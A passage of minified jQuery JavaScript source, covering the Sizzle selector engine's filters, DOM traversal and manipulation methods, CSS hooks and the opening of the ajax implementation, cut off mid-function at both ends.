b.getElementsByName!=="undefined"){var c=[],d=b.getElementsByName(a[1]);for(var e=0,f=d.length;e<f;e++)d[e].getAttribute("name")===a[1]&&c.push(d[e]);return c.length===0?null:c}},TAG:function(a,b){if(typeof b.getElementsByTagName!=="undefined")return b.getElementsByTagName(a[1])}},preFilter:{CLASS:function(a,b,c,d,e,f){a=" "+a[1].replace(i,"")+" ";if(f)return a;for(var g=0,h;(h=b[g])!=null;g++)h&&(e^(h.className&&(" "+h.className+" ").replace(/[\t\n\r]/g," ").indexOf(a)>=0)?c||d.push(h):c&&(b[g]=!1));return!1},ID:function(a){return a[1].replace(i,"")},TAG:function(a,b){return a[1].replace(i,"").toLowerCase()},CHILD:function(a){if(a[1]==="nth"){a[2]||k.error(a[0]),a[2]=a[2].replace(/^\+|\s*/g,"");var b=/(-?)(\d*)(?:n([+\-]?\d*))?/.exec(a[2]==="even"&&"2n"||a[2]==="odd"&&"2n+1"||!/\D/.test(a[2])&&"0n+"+a[2]||a[2]);a[2]=b[1]+(b[2]||1)-0,a[3]=b[3]-0}else a[2]&&k.error(a[0]);a[0]=e++;return a},ATTR:function(a,b,c,d,e,f){var g=a[1]=a[1].replace(i,"");!f&&l.attrMap[g]&&(a[1]=l.attrMap[g]),a[4]=(a[4]||a[5]||"").replace(i,""),a[2]==="~="&&(a[4]=" "+a[4]+" ");return a},PSEUDO:function(b,c,d,e,f){if(b[1]==="not")if((a.exec(b[3])||"").length>1||/^\w/.test(b[3]))b[3]=k(b[3],null,null,c);else{var g=k.filter(b[3],c,d,!0^f);d||e.push.apply(e,g);return!1}else if(l.match.POS.test(b[0])||l.match.CHILD.test(b[0]))return!0;return b},POS:function(a){a.unshift(!0);return a}},filters:{enabled:function(a){return a.disabled===!1&&a.type!=="hidden"},disabled:function(a){return a.disabled===!0},checked:function(a){return a.checked===!0},selected:function(a){a.parentNode&&a.parentNode.selectedIndex;return a.selected===!0},parent:function(a){return!!a.firstChild},empty:function(a){return!a.firstChild},has:function(a,b,c){return!!k(c[3],a).length},header:function(a){return/h\d/i.test(a.nodeName)},text:function(a){var b=a.getAttribute("type"),c=a.type;return"text"===c&&(b===c||b===null)},radio:function(a){return"radio"===a.type},checkbox:function(a){return"checkbox"===a.type},file:function(a){return"file"===a.type},password:function(a){return"password"===a.type},submit:function(a){return"submit"===a.type},image:function(a){return"image"===a.type},reset:function(a){return"reset"===a.type},button:function(a){return"button"===a.type||a.nodeName.toLowerCase()==="button"},input:function(a){return/input|select|textarea|button/i.test(a.nodeName)}},setFilters:{first:function(a,b){return b===0},last:function(a,b,c,d){return b===d.length-1},even:function(a,b){return b%2===0},odd:function(a,b){return b%2===1},lt:function(a,b,c){return b<c[3]-0},gt:function(a,b,c){return b>c[3]-0},nth:function(a,b,c){return c[3]-0===b},eq:function(a,b,c){return c[3]-0===b}},filter:{PSEUDO:function(a,b,c,d){var e=b[1],f=l.filters[e];if(f)return f(a,c,b,d);if(e==="contains")return(a.textContent||a.innerText||k.getText([a])||"").indexOf(b[3])>=0;if(e==="not"){var g=b[3];for(var h=0,i=g.length;h<i;h++)if(g[h]===a)return!1;return!0}k.error(e)},CHILD:function(a,b){var c=b[1],d=a;switch(c){case"only":case"first":while(d=d.previousSibling)if(d.nodeType===1)return!1;if(c==="first")return!0;d=a;case"last":while(d=d.nextSibling)if(d.nodeType===1)return!1;return!0;case"nth":var e=b[2],f=b[3];if(e===1&&f===0)return!0;var g=b[0],h=a.parentNode;if(h&&(h.sizcache!==g||!a.nodeIndex)){var i=0;for(d=h.firstChild;d;d=d.nextSibling)d.nodeType===1&&(d.nodeIndex=++i);h.sizcache=g}var j=a.nodeIndex-f;return e===0?j===0:j%e===0&&j/e>=0}},ID:function(a,b){return a.nodeType===1&&a.getAttribute("id")===b},TAG:function(a,b){return b==="*"&&a.nodeType===1||a.nodeName.toLowerCase()===b},CLASS:function(a,b){return(" "+(a.className||a.getAttribute("class"))+" ").indexOf(b)>-1},ATTR:function(a,b){var c=b[1],d=l.attrHandle[c]?l.attrHandle[c](a):a[c]!=null?a[c]:a.getAttribute(c),e=d+"",f=b[2],g=b[4];return d==null?f==="!=":f==="="?e===g:f==="*="?e.indexOf(g)>=0:f==="~="?(" "+e+" ").indexOf(g)>=0:g?f==="!="?e!==g:f==="^="?e.indexOf(g)===0:f==="$="?e.substr(e.length-g.length)===g:f==="|="?e===g||e.substr(0,g.length+1)===g+"-":!1:e&&d!==!1},POS:function(a,b,c,d){var e=b[2],f=l.setFilters[e];if(f)return f(a,c,b,d)}}},m=l.match.POS,n=function(a,b){return"\\"+(b-0+1)};for(var o in l.match)l.match[o]=new RegExp(l.match[o].source+/(?![^\[]*\])(?![^\(]*\))/.source),l.leftMatch[o]=new RegExp(/(^(?:.|\r|\n)*?)/.source+l.match[o].source.replace(/\\(\d+)/g,n));var p=function(a,b){a=Array.prototype.slice.call(a,0);if(b){b.push.apply(b,a);return b}return a};try{Array.prototype.slice.call(c.documentElement.childNodes,0)[0].nodeType}catch(q){p=function(a,b){var c=0,d=b||[];if(f.call(a)==="[object Array]")Array.prototype.push.apply(d,a);else if(typeof a.length==="number")for(var e=a.length;c<e;c++)d.push(a[c]);else for(;a[c];c++)d.push(a[c]);return d}}var r,s;c.documentElement.compareDocumentPosition?r=function(a,b){if(a===b){g=!0;return 0}if(!a.compareDocumentPosition||!b.compareDocumentPosition)return a.compareDocumentPosition?-1:1;return a.compareDocumentPosition(b)&4?-1:1}:(r=function(a,b){var c,d,e=[],f=[],h=a.parentNode,i=b.parentNode,j=h;if(a===b){g=!0;return 0}if(h===i)return s(a,b);if(!h)return-1;if(!i)return 1;while(j)e.unshift(j),j=j.parentNode;j=i;while(j)f.unshift(j),j=j.parentNode;c=e.length,d=f.length;for(var k=0;k<c&&k<d;k++)if(e[k]!==f[k])return s(e[k],f[k]);return k===c?s(a,f[k],-1):s(e[k],b,1)},s=function(a,b,c){if(a===b)return c;var d=a.nextSibling;while(d){if(d===b)return-1;d=d.nextSibling}return 1}),k.getText=function(a){var b="",c;for(var d=0;a[d];d++)c=a[d],c.nodeType===3||c.nodeType===4?b+=c.nodeValue:c.nodeType!==8&&(b+=k.getText(c.childNodes));return b},function(){var a=c.createElement("div"),d="script"+(new Date).getTime(),e=c.documentElement;a.innerHTML="<a name='"+d+"'/>",e.insertBefore(a,e.firstChild),c.getElementById(d)&&(l.find.ID=function(a,c,d){if(typeof c.getElementById!=="undefined"&&!d){var e=c.getElementById(a[1]);return e?e.id===a[1]||typeof e.getAttributeNode!=="undefined"&&e.getAttributeNode("id").nodeValue===a[1]?[e]:b:[]}},l.filter.ID=function(a,b){var c=typeof a.getAttributeNode!=="undefined"&&a.getAttributeNode("id");return a.nodeType===1&&c&&c.nodeValue===b}),e.removeChild(a),e=a=null}(),function(){var a=c.createElement("div");a.appendChild(c.createComment("")),a.getElementsByTagName("*").length>0&&(l.find.TAG=function(a,b){var c=b.getElementsByTagName(a[1]);if(a[1]==="*"){var d=[];for(var e=0;c[e];e++)c[e].nodeType===1&&d.push(c[e]);c=d}return c}),a.innerHTML="<a href='#'></a>",a.firstChild&&typeof a.firstChild.getAttribute!=="undefined"&&a.firstChild.getAttribute("href")!=="#"&&(l.attrHandle.href=function(a){return a.getAttribute("href",2)}),a=null}(),c.querySelectorAll&&function(){var a=k,b=c.createElement("div"),d="__sizzle__";b.innerHTML="<p class='TEST'></p>";if(!b.querySelectorAll||b.querySelectorAll(".TEST").length!==0){k=function(b,e,f,g){e=e||c;if(!g&&!k.isXML(e)){var h=/^(\w+$)|^\.([\w\-]+$)|^#([\w\-]+$)/.exec(b);if(h&&(e.nodeType===1||e.nodeType===9)){if(h[1])return p(e.getElementsByTagName(b),f);if(h[2]&&l.find.CLASS&&e.getElementsByClassName)return p(e.getElementsByClassName(h[2]),f)}if(e.nodeType===9){if(b==="body"&&e.body)return p([e.body],f);if(h&&h[3]){var i=e.getElementById(h[3]);if(!i||!i.parentNode)return p([],f);if(i.id===h[3])return p([i],f)}try{return p(e.querySelectorAll(b),f)}catch(j){}}else if(e.nodeType===1&&e.nodeName.toLowerCase()!=="object"){var m=e,n=e.getAttribute("id"),o=n||d,q=e.parentNode,r=/^\s*[+~]/.test(b);n?o=o.replace(/'/g,"\\$&"):e.setAttribute("id",o),r&&q&&(e=e.parentNode);try{if(!r||q)return p(e.querySelectorAll("[id='"+o+"'] "+b),f)}catch(s){}finally{n||m.removeAttribute("id")}}}return a(b,e,f,g)};for(var e in a)k[e]=a[e];b=null}}(),function(){var a=c.documentElement,b=a.matchesSelector||a.mozMatchesSelector||a.webkitMatchesSelector||a.msMatchesSelector;if(b){var d=!b.call(c.createElement("div"),"div"),e=!1;try{b.call(c.documentElement,"[test!='']:sizzle")}catch(f){e=!0}k.matchesSelector=function(a,c){c=c.replace(/\=\s*([^'"\]]*)\s*\]/g,"='$1']");if(!k.isXML(a))try{if(e||!l.match.PSEUDO.test(c)&&!/!=/.test(c)){var f=b.call(a,c);if(f||!d||a.document&&a.document.nodeType!==11)return f}}catch(g){}return k(c,null,null,[a]).length>0}}}(),function(){var a=c.createElement("div");a.innerHTML="<div class='test e'></div><div class='test'></div>";if(a.getElementsByClassName&&a.getElementsByClassName("e").length!==0){a.lastChild.className="e";if(a.getElementsByClassName("e").length===1)return;l.order.splice(1,0,"CLASS"),l.find.CLASS=function(a,b,c){if(typeof b.getElementsByClassName!=="undefined"&&!c)return b.getElementsByClassName(a[1])},a=null}}(),c.documentElement.contains?k.contains=function(a,b){return a!==b&&(a.contains?a.contains(b):!0)}:c.documentElement.compareDocumentPosition?k.contains=function(a,b){return!!(a.compareDocumentPosition(b)&16)}:k.contains=function(){return!1},k.isXML=function(a){var b=(a?a.ownerDocument||a:0).documentElement;return b?b.nodeName!=="HTML":!1};var v=function(a,b){var c,d=[],e="",f=b.nodeType?[b]:b;while(c=l.match.PSEUDO.exec(a))e+=c[0],a=a.replace(l.match.PSEUDO,"");a=l.relative[a]?a+"*":a;for(var g=0,h=f.length;g<h;g++)k(a,f[g],d);return k.filter(e,d)};d.find=k,d.expr=k.selectors,d.expr[":"]=d.expr.filters,d.unique=k.uniqueSort,d.text=k.getText,d.isXMLDoc=k.isXML,d.contains=k.contains}();var I=/Until$/,J=/^(?:parents|prevUntil|prevAll)/,K=/,/,L=/^.[^:#\[\.,]*$/,M=Array.prototype.slice,N=d.expr.match.POS,O={children:!0,contents:!0,next:!0,prev:!0};d.fn.extend({find:function(a){var b=this.pushStack("","find",a),c=0;for(var e=0,f=this.length;e<f;e++){c=b.length,d.find(a,this[e],b);if(e>0)for(var g=c;g<b.length;g++)for(var h=0;h<c;h++)if(b[h]===b[g]){b.splice(g--,1);break}}return b},has:function(a){var b=d(a);return this.filter(function(){for(var a=0,c=b.length;a<c;a++)if(d.contains(this,b[a]))return!0})},not:function(a){return this.pushStack(Q(this,a,!1),"not",a)},filter:function(a){return this.pushStack(Q(this,a,!0),"filter",a)},is:function(a){return!!a&&d.filter(a,this).length>0},closest:function(a,b){var c=[],e,f,g=this[0];if(d.isArray(a)){var h,i,j={},k=1;if(g&&a.length){for(e=0,f=a.length;e<f;e++)i=a[e],j[i]||(j[i]=d.expr.match.POS.test(i)?d(i,b||this.context):i);while(g&&g.ownerDocument&&g!==b){for(i in j)h=j[i],(h.jquery?h.index(g)>-1:d(g).is(h))&&c.push({selector:i,elem:g,level:k});g=g.parentNode,k++}}return c}var l=N.test(a)?d(a,b||this.context):null;for(e=0,f=this.length;e<f;e++){g=this[e];while(g){if(l?l.index(g)>-1:d.find.matchesSelector(g,a)){c.push(g);break}g=g.parentNode;if(!g||!g.ownerDocument||g===b)break}}c=c.length>1?d.unique(c):c;return this.pushStack(c,"closest",a)},index:function(a){if(!a||typeof a==="string")return d.inArray(this[0],a?d(a):this.parent().children());return d.inArray(a.jquery?a[0]:a,this)},add:function(a,b){var c=typeof a==="string"?d(a,b):d.makeArray(a),e=d.merge(this.get(),c);return this.pushStack(P(c[0])||P(e[0])?e:d.unique(e))},andSelf:function(){return this.add(this.prevObject)}}),d.each({parent:function(a){var b=a.parentNode;return b&&b.nodeType!==11?b:null},parents:function(a){return d.dir(a,"parentNode")},parentsUntil:function(a,b,c){return d.dir(a,"parentNode",c)},next:function(a){return d.nth(a,2,"nextSibling")},prev:function(a){return d.nth(a,2,"previousSibling")},nextAll:function(a){return d.dir(a,"nextSibling")},prevAll:function(a){return d.dir(a,"previousSibling")},nextUntil:function(a,b,c){return d.dir(a,"nextSibling",c)},prevUntil:function(a,b,c){return d.dir(a,"previousSibling",c)},siblings:function(a){return d.sibling(a.parentNode.firstChild,a)},children:function(a){return d.sibling(a.firstChild)},contents:function(a){return d.nodeName(a,"iframe")?a.contentDocument||a.contentWindow.document:d.makeArray(a.childNodes)}},function(a,b){d.fn[a]=function(c,e){var f=d.map(this,b,c),g=M.call(arguments);I.test(a)||(e=c),e&&typeof e==="string"&&(f=d.filter(e,f)),f=this.length>1&&!O[a]?d.unique(f):f,(this.length>1||K.test(e))&&J.test(a)&&(f=f.reverse());return this.pushStack(f,a,g.join(","))}}),d.extend({filter:function(a,b,c){c&&(a=":not("+a+")");return b.length===1?d.find.matchesSelector(b[0],a)?[b[0]]:[]:d.find.matches(a,b)},dir:function(a,c,e){var f=[],g=a[c];while(g&&g.nodeType!==9&&(e===b||g.nodeType!==1||!d(g).is(e)))g.nodeType===1&&f.push(g),g=g[c];return f},nth:function(a,b,c,d){b=b||1;var e=0;for(;a;a=a[c])if(a.nodeType===1&&++e===b)break;return a},sibling:function(a,b){var c=[];for(;a;a=a.nextSibling)a.nodeType===1&&a!==b&&c.push(a);return c}});var R=/ jQuery\d+="(?:\d+|null)"/g,S=/^\s+/,T=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/ig,U=/<([\w:]+)/,V=/<tbody/i,W=/<|&#?\w+;/,X=/<(?:script|object|embed|option|style)/i,Y=/checked\s*(?:[^=]|=\s*.checked.)/i,Z={option:[1,"<select multiple='multiple'>","</select>"],legend:[1,"<fieldset>","</fieldset>"],thead:[1,"<table>","</table>"],tr:[2,"<table><tbody>","</tbody></table>"],td:[3,"<table><tbody><tr>","</tr></tbody></table>"],col:[2,"<table><tbody></tbody><colgroup>","</colgroup></table>"],area:[1,"<map>","</map>"],_default:[0,"",""]};Z.optgroup=Z.option,Z.tbody=Z.tfoot=Z.colgroup=Z.caption=Z.thead,Z.th=Z.td,d.support.htmlSerialize||(Z._default=[1,"div<div>","</div>"]),d.fn.extend({text:function(a){if(d.isFunction(a))return this.each(function(b){var c=d(this);c.text(a.call(this,b,c.text()))});if(typeof a!=="object"&&a!==b)return this.empty().append((this[0]&&this[0].ownerDocument||c).createTextNode(a));return d.text(this)},wrapAll:function(a){if(d.isFunction(a))return this.each(function(b){d(this).wrapAll(a.call(this,b))});if(this[0]){var b=d(a,this[0].ownerDocument).eq(0).clone(!0);this[0].parentNode&&b.insertBefore(this[0]),b.map(function(){var a=this;while(a.firstChild&&a.firstChild.nodeType===1)a=a.firstChild;return a}).append(this)}return this},wrapInner:function(a){if(d.isFunction(a))return this.each(function(b){d(this).wrapInner(a.call(this,b))});return this.each(function(){var b=d(this),c=b.contents();c.length?c.wrapAll(a):b.append(a)})},wrap:function(a){return this.each(function(){d(this).wrapAll(a)})},unwrap:function(){return this.parent().each(function(){d.nodeName(this,"body")||d(this).replaceWith(this.childNodes)}).end()},append:function(){return this.domManip(arguments,!0,function(a){this.nodeType===1&&this.appendChild(a)})},prepend:function(){return this.domManip(arguments,!0,function(a){this.nodeType===1&&this.insertBefore(a,this.firstChild)})},before:function(){if(this[0]&&this[0].parentNode)return this.domManip(arguments,!1,function(a){this.parentNode.insertBefore(a,this)});if(arguments.length){var a=d(arguments[0]);a.push.apply(a,this.toArray());return this.pushStack(a,"before",arguments)}},after:function(){if(this[0]&&this[0].parentNode)return this.domManip(arguments,!1,function(a){this.parentNode.insertBefore(a,this.nextSibling)});if(arguments.length){var a=this.pushStack(this,"after",arguments);a.push.apply(a,d(arguments[0]).toArray());return a}},remove:function(a,b){for(var c=0,e;(e=this[c])!=null;c++)if(!a||d.filter(a,[e]).length)!b&&e.nodeType===1&&(d.cleanData(e.getElementsByTagName("*")),d.cleanData([e])),e.parentNode&&e.parentNode.removeChild(e);return this},empty:function(){for(var a=0,b;(b=this[a])!=null;a++){b.nodeType===1&&d.cleanData(b.getElementsByTagName("*"));while(b.firstChild)b.removeChild(b.firstChild)}return this},clone:function(a,b){a=a==null?!1:a,b=b==null?a:b;return this.map(function(){return d.clone(this,a,b)})},html:function(a){if(a===b)return this[0]&&this[0].nodeType===1?this[0].innerHTML.replace(R,""):null;if(typeof a!=="string"||X.test(a)||!d.support.leadingWhitespace&&S.test(a)||Z[(U.exec(a)||["",""])[1].toLowerCase()])d.isFunction(a)?this.each(function(b){var c=d(this);c.html(a.call(this,b,c.html()))}):this.empty().append(a);else{a=a.replace(T,"<$1></$2>");try{for(var c=0,e=this.length;c<e;c++)this[c].nodeType===1&&(d.cleanData(this[c].getElementsByTagName("*")),this[c].innerHTML=a)}catch(f){this.empty().append(a)}}return this},replaceWith:function(a){if(this[0]&&this[0].parentNode){if(d.isFunction(a))return this.each(function(b){var c=d(this),e=c.html();c.replaceWith(a.call(this,b,e))});typeof a!=="string"&&(a=d(a).detach());return this.each(function(){var b=this.nextSibling,c=this.parentNode;d(this).remove(),b?d(b).before(a):d(c).append(a)})}return this.length?this.pushStack(d(d.isFunction(a)?a():a),"replaceWith",a):this},detach:function(a){return this.remove(a,!0)},domManip:function(a,c,e){var f,g,h,i,j=a[0],k=[];if(!d.support.checkClone&&arguments.length===3&&typeof j==="string"&&Y.test(j))return this.each(function(){d(this).domManip(a,c,e,!0)});if(d.isFunction(j))return this.each(function(f){var g=d(this);a[0]=j.call(this,f,c?g.html():b),g.domManip(a,c,e)});if(this[0]){i=j&&j.parentNode,d.support.parentNode&&i&&i.nodeType===11&&i.childNodes.length===this.length?f={fragment:i}:f=d.buildFragment(a,this,k),h=f.fragment,h.childNodes.length===1?g=h=h.firstChild:g=h.firstChild;if(g){c=c&&d.nodeName(g,"tr");for(var l=0,m=this.length,n=m-1;l<m;l++)e.call(c?$(this[l],g):this[l],f.cacheable||m>1&&l<n?d.clone(h,!0,!0):h)}k.length&&d.each(k,bc)}return this}}),d.buildFragment=function(a,b,e){var f,g,h,i=b&&b[0]?b[0].ownerDocument||b[0]:c;a.length===1&&typeof a[0]==="string"&&a[0].length<512&&i===c&&a[0].charAt(0)==="<"&&!X.test(a[0])&&(d.support.checkClone||!Y.test(a[0]))&&(g=!0,h=d.fragments[a[0]],h&&(h!==1&&(f=h))),f||(f=i.createDocumentFragment(),d.clean(a,i,f,e)),g&&(d.fragments[a[0]]=h?f:1);return{fragment:f,cacheable:g}},d.fragments={},d.each({appendTo:"append",prependTo:"prepend",insertBefore:"before",insertAfter:"after",replaceAll:"replaceWith"},function(a,b){d.fn[a]=function(c){var e=[],f=d(c),g=this.length===1&&this[0].parentNode;if(g&&g.nodeType===11&&g.childNodes.length===1&&f.length===1){f[b](this[0]);return this}for(var h=0,i=f.length;h<i;h++){var j=(h>0?this.clone(!0):this).get();d(f[h])[b](j),e=e.concat(j)}return this.pushStack(e,a,f.selector)}}),d.extend({clone:function(a,b,c){var e=a.cloneNode(!0),f,g,h;if((!d.support.noCloneEvent||!d.support.noCloneChecked)&&(a.nodeType===1||a.nodeType===11)&&!d.isXMLDoc(a)){ba(a,e),f=bb(a),g=bb(e);for(h=0;f[h];++h)ba(f[h],g[h])}if(b){_(a,e);if(c){f=bb(a),g=bb(e);for(h=0;f[h];++h)_(f[h],g[h])}}return e},clean:function(a,b,e,f){b=b||c,typeof b.createElement==="undefined"&&(b=b.ownerDocument||b[0]&&b[0].ownerDocument||c);var g=[];for(var h=0,i;(i=a[h])!=null;h++){typeof i==="number"&&(i+="");if(!i)continue;if(typeof i!=="string"||W.test(i)){if(typeof i==="string"){i=i.replace(T,"<$1></$2>");var j=(U.exec(i)||["",""])[1].toLowerCase(),k=Z[j]||Z._default,l=k[0],m=b.createElement("div");m.innerHTML=k[1]+i+k[2];while(l--)m=m.lastChild;if(!d.support.tbody){var n=V.test(i),o=j==="table"&&!n?m.firstChild&&m.firstChild.childNodes:k[1]==="<table>"&&!n?m.childNodes:[];for(var p=o.length-1;p>=0;--p)d.nodeName(o[p],"tbody")&&!o[p].childNodes.length&&o[p].parentNode.removeChild(o[p])}!d.support.leadingWhitespace&&S.test(i)&&m.insertBefore(b.createTextNode(S.exec(i)[0]),m.firstChild),i=m.childNodes}}else i=b.createTextNode(i);i.nodeType?g.push(i):g=d.merge(g,i)}if(e)for(h=0;g[h];h++)!f||!d.nodeName(g[h],"script")||g[h].type&&g[h].type.toLowerCase()!=="text/javascript"?(g[h].nodeType===1&&g.splice.apply(g,[h+1,0].concat(d.makeArray(g[h].getElementsByTagName("script")))),e.appendChild(g[h])):f.push(g[h].parentNode?g[h].parentNode.removeChild(g[h]):g[h]);return g},cleanData:function(a){var b,c,e=d.cache,f=d.expando,g=d.event.special,h=d.support.deleteExpando;for(var i=0,j;(j=a[i])!=null;i++){if(j.nodeName&&d.noData[j.nodeName.toLowerCase()])continue;c=j[d.expando];if(c){b=e[c]&&e[c][f];if(b&&b.events){for(var k in b.events)g[k]?d.event.remove(j,k):d.removeEvent(j,k,b.handle);b.handle&&(b.handle.elem=null)}h?delete j[d.expando]:j.removeAttribute&&j.removeAttribute(d.expando),delete e[c]}}}});var bd=/alpha\([^)]*\)/i,be=/opacity=([^)]*)/,bf=/-([a-z])/ig,bg=/([A-Z]|^ms)/g,bh=/^-?\d+(?:px)?$/i,bi=/^-?\d/,bj={position:"absolute",visibility:"hidden",display:"block"},bk=["Left","Right"],bl=["Top","Bottom"],bm,bn,bo,bp=function(a,b){return b.toUpperCase()};d.fn.css=function(a,c){if(arguments.length===2&&c===b)return this;return d.access(this,a,c,!0,function(a,c,e){return e!==b?d.style(a,c,e):d.css(a,c)})},d.extend({cssHooks:{opacity:{get:function(a,b){if(b){var c=bm(a,"opacity","opacity");return c===""?"1":c}return a.style.opacity}}},cssNumber:{zIndex:!0,fontWeight:!0,opacity:!0,zoom:!0,lineHeight:!0},cssProps:{"float":d.support.cssFloat?"cssFloat":"styleFloat"},style:function(a,c,e,f){if(a&&a.nodeType!==3&&a.nodeType!==8&&a.style){var g,h=d.camelCase(c),i=a.style,j=d.cssHooks[h];c=d.cssProps[h]||h;if(e===b){if(j&&"get"in j&&(g=j.get(a,!1,f))!==b)return g;return i[c]}if(typeof e==="number"&&isNaN(e)||e==null)return;typeof e==="number"&&!d.cssNumber[h]&&(e+="px");if(!j||!("set"in j)||(e=j.set(a,e))!==b)try{i[c]=e}catch(k){}}},css:function(a,c,e){var f,g=d.camelCase(c),h=d.cssHooks[g];c=d.cssProps[g]||g;if(h&&"get"in h&&(f=h.get(a,!0,e))!==b)return f;if(bm)return bm(a,c,g)},swap:function(a,b,c){var d={};for(var e in b)d[e]=a.style[e],a.style[e]=b[e];c.call(a);for(e in b)a.style[e]=d[e]},camelCase:function(a){return a.replace(bf,bp)}}),d.curCSS=d.css,d.each(["height","width"],function(a,b){d.cssHooks[b]={get:function(a,c,e){var f;if(c){a.offsetWidth!==0?f=bq(a,b,e):d.swap(a,bj,function(){f=bq(a,b,e)});if(f<=0){f=bm(a,b,b),f==="0px"&&bo&&(f=bo(a,b,b));if(f!=null)return f===""||f==="auto"?"0px":f}if(f<0||f==null){f=a.style[b];return f===""||f==="auto"?"0px":f}return typeof f==="string"?f:f+"px"}},set:function(a,b){if(!bh.test(b))return b;b=parseFloat(b);if(b>=0)return b+"px"}}}),d.support.opacity||(d.cssHooks.opacity={get:function(a,b){return be.test((b&&a.currentStyle?a.currentStyle.filter:a.style.filter)||"")?parseFloat(RegExp.$1)/100+"":b?"1":""},set:function(a,b){var c=a.style;c.zoom=1;var e=d.isNaN(b)?"":"alpha(opacity="+b*100+")",f=c.filter||"";c.filter=bd.test(f)?f.replace(bd,e):c.filter+" "+e}}),d(function(){d.support.reliableMarginRight||(d.cssHooks.marginRight={get:function(a,b){var c;d.swap(a,{display:"inline-block"},function(){b?c=bm(a,"margin-right","marginRight"):c=a.style.marginRight});return c}})}),c.defaultView&&c.defaultView.getComputedStyle&&(bn=function(a,c,e){var f,g,h;e=e.replace(bg,"-$1").toLowerCase();if(!(g=a.ownerDocument.defaultView))return b;if(h=g.getComputedStyle(a,null))f=h.getPropertyValue(e),f===""&&!d.contains(a.ownerDocument.documentElement,a)&&(f=d.style(a,e));return f}),c.documentElement.currentStyle&&(bo=function(a,b){var c,d=a.currentStyle&&a.currentStyle[b],e=a.runtimeStyle&&a.runtimeStyle[b],f=a.style;!bh.test(d)&&bi.test(d)&&(c=f.left,e&&(a.runtimeStyle.left=a.currentStyle.left),f.left=b==="fontSize"?"1em":d||0,d=f.pixelLeft+"px",f.left=c,e&&(a.runtimeStyle.left=e));return d===""?"auto":d}),bm=bn||bo,d.expr&&d.expr.filters&&(d.expr.filters.hidden=function(a){var b=a.offsetWidth,c=a.offsetHeight;return b===0&&c===0||!d.support.reliableHiddenOffsets&&(a.style.display||d.css(a,"display"))==="none"},d.expr.filters.visible=function(a){return!d.expr.filters.hidden(a)});var br=/%20/g,bs=/\[\]$/,bt=/\r?\n/g,bu=/#.*$/,bv=/^(.*?):[ \t]*([^\r\n]*)\r?$/mg,bw=/^(?:color|date|datetime|email|hidden|month|number|password|range|search|tel|text|time|url|week)$/i,bx=/^(?:about|app|app\-storage|.+\-extension|file|widget):$/,by=/^(?:GET|HEAD)$/,bz=/^\/\//,bA=/\?/,bB=/<script\b[^<]*(?:(?!<\/script>)<[^<]*)*<\/script>/gi,bC=/^(?:select|textarea)/i,bD=/\s+/,bE=/([?&])_=[^&]*/,bF=/(^|\-)([a-z])/g,bG=function(a,b,c){return b+c.toUpperCase()},bH=/^([\w\+\.\-]+:)(?:\/\/([^\/?#:]*)(?::(\d+))?)?/,bI=d.fn.load,bJ={},bK={},bL,bM;try{bL=c.location.href}catch(bN){bL=c.createElement("a"),bL.href="",bL=bL.href}bM=bH.exec(bL.toLowerCase())||[],d.fn.extend({load:function(a,c,e){if(typeof a!=="string"&&bI)return bI.apply(this,arguments);if(!this.length)return this;var f=a.indexOf(" ");if(f>=0){var g=a.slice(f,a.length);a=a.slice(0,f)}var h="GET";c&&(d.isFunction(c)?(e=c,c=b):typeof c==="object"&&(c=d.param(c,d.ajaxSettings.traditional),h="POST"));var i=this;d.ajax({url:a,type:h,dataType:"html",data:c,complete:function(a,b,c){c=a.responseText,a.isResolved()&&(a.done(function(a){c=a}),i.html(g?d("<div>").append(c.replace(bB,"")).find(g):c)),e&&i.each(e,[c,b,a])}});return this},serialize:function(){return d.param(this.serializeArray())},serializeArray:function(){return this.map(function(){return this.elements?d.makeArray(this.elements):this}).filter(function(){return this.name&&!this.disabled&&(this.checked||bC.test(this.nodeName)||bw.test(this.type))}).map(function(a,b){var c=d(this).val();return c==null?null:d.isArray(c)?d.map(c,function(a,c){return{name:b.name,value:a.replace(bt,"\r\n")}}):{name:b.name,value:c.replace(bt,"\r\n")}}).get()}}),d.each("ajaxStart ajaxStop ajaxComplete ajaxError ajaxSuccess ajaxSend".split(" "),function(a,b){d.fn[b]=function(a){return this.bind(b,a)}}),d.each(["get","post"],function(a,c){d[c]=function(a,e,f,g){d.isFunction(e)&&(g=g||f,f=e,e=b);return d.ajax({type:c,url:a,data:e,success:f,dataType:g})}}),d.extend({getScript:function(a,c){return d.get(a,b,c,"script")},getJSON:function(a,b,c){return d.get(a,b,c,"json")},ajaxSetup:function(a,b){b?d.extend(!0,a,d.ajaxSettings,b):(b=a,a=d.extend(!0,d.ajaxSettings,b));for(var c in {context:1,url:1})c in b?a[c]=b[c]:c in d.ajaxSettings&&(a[c]=d.ajaxSettings[c]);return a},ajaxSettings:{url:bL,isLocal:bx.test(bM[1]),global:!0,type:"GET",contentType:"application/x-www-form-urlencoded",processData:!0,async:!0,accepts:{xml:"application/xml, text/xml",html:"text/html",text:"text/plain",json:"application/json, text/javascript","*":"*/*"},contents:{xml:/xml/,html:/html/,json:/json/},responseFields:{xml:"responseXML",text:"responseText"},converters:{"* text":a.String,"text html":!0,"text json":d.parseJSON,"text xml":d.parseXML}},ajaxPrefilter:bO(bJ),ajaxTransport:bO(bK),ajax:function(a,c){function v(a,c,l,n){if(r!==2){r=2,p&&clearTimeout(p),o=b,m=n||"",u.readyState=a?4:0;var q,t,v,w=l?bR(e,u,l):b,x,y;if(a>=200&&a<300||a===304){if(e.ifModified){if(x=u.getResponseHeader("Last-Modified"))d.lastModified[k]=x;if(y=u.getResponseHeader("Etag"))d.etag[k]=y}if(a===304)c="notmodified",q=!0;else try{t=bS(e,w),c="success",q=!0}catch(z){c="parsererror",v=z}}else{v=c;if(!c||a)c="error",a<0&&(a=0)}u.status=a,u.statusText=c,q?h.resolveWith(f,[t,c,u]):h.rejectWith(f,[u,c,v]),u.statusCode(j),j=b,s&&g.trigger("ajax"+(q?"Success":"Error"),[u,e,q?t:v]),i.resolveWith(f,[u,c]),s&&(g.trigger("ajaxComplete",[u,e]),--d.active||d.event.trigger("ajaxStop"))}}typeof a==="object"&&(c=a,a=b),c=c||{};var e=d.ajaxSetup({},c),f=e.context||e,g=f!==e&&(f.nodeType||f instanceof d)?d(f):d.event,h=d.Deferred(),i=d._Deferred(),j=e.statusCode||{},k,l={},m,n,o,p,q,r=0,s,t,u={readyState:0,setRequestHeader:function(a,b){r||(l[a.toLowerCase().replace(bF,bG)]=b);return this},getAllResponseHeaders:function(){return r===2?m:null},getResponseHeader:function(a){var 